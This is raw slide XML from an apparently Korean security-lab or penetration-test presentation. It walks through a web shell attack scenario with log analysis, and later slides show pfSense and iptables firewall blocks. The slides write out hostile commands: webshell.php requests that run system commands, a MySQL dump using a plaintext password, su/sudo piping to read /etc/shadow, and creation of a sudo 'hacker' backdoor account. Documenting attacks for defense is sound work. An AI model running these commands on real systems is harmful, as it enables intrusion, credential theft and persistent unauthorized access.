            <a:ext cx="5569374" cy="319633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8" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950457" y="1488101"/>
            <a:ext cx="333910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 dirty="0" err="1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webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>업로드</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="그림 70"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="36820" t="50000" r="35880" b="8530"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="262521" y="1841500"/>
            <a:ext cx="5338407" cy="31666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2" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324155" y="1473362"/>
            <a:ext cx="4103828" cy="24656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SQL injection Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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성공</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2206756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5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" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352730" y="1343787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082860" y="1032891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311460" y="1003630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352729" y="380924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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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웹셀</a:t>
            </a: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설치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352730" y="943280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웹쉘 공격 시도에 대한 통합 로그 분석 및 타임라인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="그림 6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29463" y="1806490"/>
            <a:ext cx="5400040" cy="24754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0" name="그림 69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699633" y="1825540"/>
            <a:ext cx="5400040" cy="24677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1" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5750432" y="1495806"/>
            <a:ext cx="4103828" cy="24656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http://10.10.0.102/upload/webshell.php?cmd=ls </a:t>
            </a:r>
            <a:r>
              <a:rPr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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="EN-US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al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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1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72" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225932" y="1495806"/>
            <a:ext cx="4103828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http://10.10.0.102/upload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/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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1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73" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500794" y="4545301"/>
            <a:ext cx="3895877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upload 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폴더 리스트 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Image 1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63277" y="4562905"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019648" y="4550064"/>
            <a:ext cx="3895877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웹셀</a:t>
            </a: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.php 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를</a:t>
            </a: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통한 명령어 입력 가능 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Image 1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782132" y="4567668"/>
            <a:ext cx="178905" cy="1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49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0785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" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238430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9968560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197160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238429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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238429" y="1438656"/>
            <a:ext cx="333910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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238430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웹쉘 공격 시도에 대한 통합 로그 분석 및 타임라인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254507" y="1438656"/>
            <a:ext cx="5476941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http://10.10.0.102/upload/webshell.php?cmd=ls ../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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs typeface="Noto Sans KR"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="그림 71"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="750" b="41320"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="238430" y="1705661"/>
            <a:ext cx="10617624" cy="14835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3" name="그림 72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38429" y="3754967"/>
            <a:ext cx="5400040" cy="213347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4" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264032" y="3410331"/>
            <a:ext cx="5476941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http://10.10.0.102/upload/webshell.php?cmd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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="EN-US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base64 ../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="EN-US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common.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="오른쪽 화살표 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879745" y="4674658"/>
            <a:ext cx="575505" cy="58737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96050" y="3972933"/>
            <a:ext cx="4590756" cy="1915507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119652" y="3400958"/>
            <a:ext cx="3895877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 dirty="0" err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평문으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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인식되어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0" err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인코딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0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내용 출력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Image 1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882136" y="3418562"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6745686" y="5934608"/>
            <a:ext cx="3895877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DB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계정 정보 탈취</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="Image 1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508170" y="5961737"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5012136" y="1772465"/>
            <a:ext cx="3895877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DB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계정 정보 탈취</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Image 1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774620" y="1771019"/>
            <a:ext cx="178905" cy="1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78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5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" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219380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9949510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178110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219379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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219379" y="4286631"/>
            <a:ext cx="333910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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219380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base64 decoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="그림 8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19380" y="4553483"/>
            <a:ext cx="10077874" cy="198903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4" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235457" y="4248531"/>
            <a:ext cx="9572692" cy="24780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http://10.10.0.102/upload/webshell.php?cmd=mysql -u </a:t>
            </a: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roror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 -pqhdks12 -e "select * from </a:t>
            </a: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pentest.members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;“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b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1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87" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653194" y="5888326"/>
            <a:ext cx="3895877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6182D6"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>DB pentest.members </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88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5677" y="5886880"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="그림 94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08368" y="1831974"/>
            <a:ext cx="10061797" cy="21328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6" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235457" y="1495806"/>
            <a:ext cx="1077890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http://10.10.0.102/upload/webshell.php?cmd=mysql%20-u%20roror%20-pqhdks12%20-e%20%22DESC%20pentest.members;%22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt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굴림"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643669" y="3249901"/>
            <a:ext cx="3895877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6182D6"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>DB Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="6182D6"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>구조 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98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06152" y="3267505"/>
            <a:ext cx="178905" cy="1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15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0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082860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352729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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352729" y="1438656"/>
            <a:ext cx="333910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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352730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base64 decoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368807" y="1438656"/>
            <a:ext cx="9572692" cy="24780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terminal.php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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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업로드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b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="굴림"/>
              <a:ea typeface="굴림"/>
              <a:cs typeface="굴림"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="그림 8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52728" y="1799166"/>
            <a:ext cx="7802456" cy="431490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06151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0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38130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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="1438656"/>
            <a:ext cx="333910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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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base64 decoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397382" y="1438656"/>
            <a:ext cx="9572692" cy="24780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root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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권한 획득</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="그림 90"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="33050"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334237" y="1820332"/>
            <a:ext cx="10005797" cy="19035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3" name="그림 92"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="33940" b="67550"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="324713" y="3862917"/>
            <a:ext cx="10015322" cy="25282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4" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2366487" y="1013155"/>
            <a:ext cx="333910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altLang="ko-KR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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95" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2445257" y="2212562"/>
            <a:ext cx="5476941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echo “qhdks12” | </a:t>
            </a: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su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 - </a:t>
            </a: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roror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 -c ‘echo “qhdks12” | </a:t>
            </a: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sudo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 -S id” 2&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2445257" y="4231862"/>
            <a:ext cx="674636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echo “qhdks12” | </a:t>
            </a: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su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 - </a:t>
            </a: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roror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 -c ‘echo “qhdks12” | </a:t>
            </a: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sudo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 -S  cat /</a:t>
            </a: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etc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/shadow” 2&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390360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0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38130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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="1448181"/>
            <a:ext cx="194845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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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원격 접속 아이디 생성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="그림 93"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1340" t="28050" r="45800" b="50000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="1908707"/>
            <a:ext cx="5970217" cy="10159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5" name="그림 94"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="44280" b="67610"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397382" y="2924705"/>
            <a:ext cx="5954139" cy="16007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6" name="그림 95"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect r="10310" b="54930"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397382" y="4525433"/>
            <a:ext cx="5954139" cy="19828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7" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669732" y="1547740"/>
            <a:ext cx="4448012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관리자 권한을 가진 </a:t>
            </a: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hacker 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아이디 생성 및 비밀번호 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Image 1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22691" y="1565344"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="그림 98"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect r="43110" b="64870"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679710" y="1920058"/>
            <a:ext cx="5131595" cy="26053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2" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6982129" y="4610481"/>
            <a:ext cx="194845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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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103" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270557" y="4610481"/>
            <a:ext cx="4448012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생성한 아이디로 원격 접속을 시도하였으나 기존에 설정한</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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pfSense rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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에 의해 접속 불가</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Image 1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023516" y="4628085"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842975" y="1918156"/>
            <a:ext cx="674636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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0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 -m hacker -G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="l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굴림"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt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굴림"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928700" y="3204031"/>
            <a:ext cx="674636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i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="굴림"/>
              </a:rPr>
              <a:t>grep “hacker” /etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928700" y="5006158"/>
            <a:ext cx="674636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i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="굴림"/>
                <a:ea typeface="굴림"/>
                <a:cs typeface="굴림"/>
              </a:rPr>
              <a:t>sh -c “echo hacker:hacker123 | chpasswd” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2733734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0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38130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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a: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명령 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38130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기밀 문서 서버 접속 시도</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="그림 94"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1920" t="18420" r="8120" b="39390"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1748714"/>
            <a:ext cx="11535156" cy="40434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6" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745077" y="5374378"/>
            <a:ext cx="194845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altLang="ko-KR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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97" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476249" y="2075179"/>
            <a:ext cx="4448012" cy="39567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기밀 문서 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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룰에 의해 접속 차단</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98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153606" y="2094113"/>
            <a:ext cx="178905" cy="1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hape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="367133"/>
            <a:ext cx="761695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 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="509779"/>
            <a:ext cx="5353812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pfSense-1 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방화벽 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
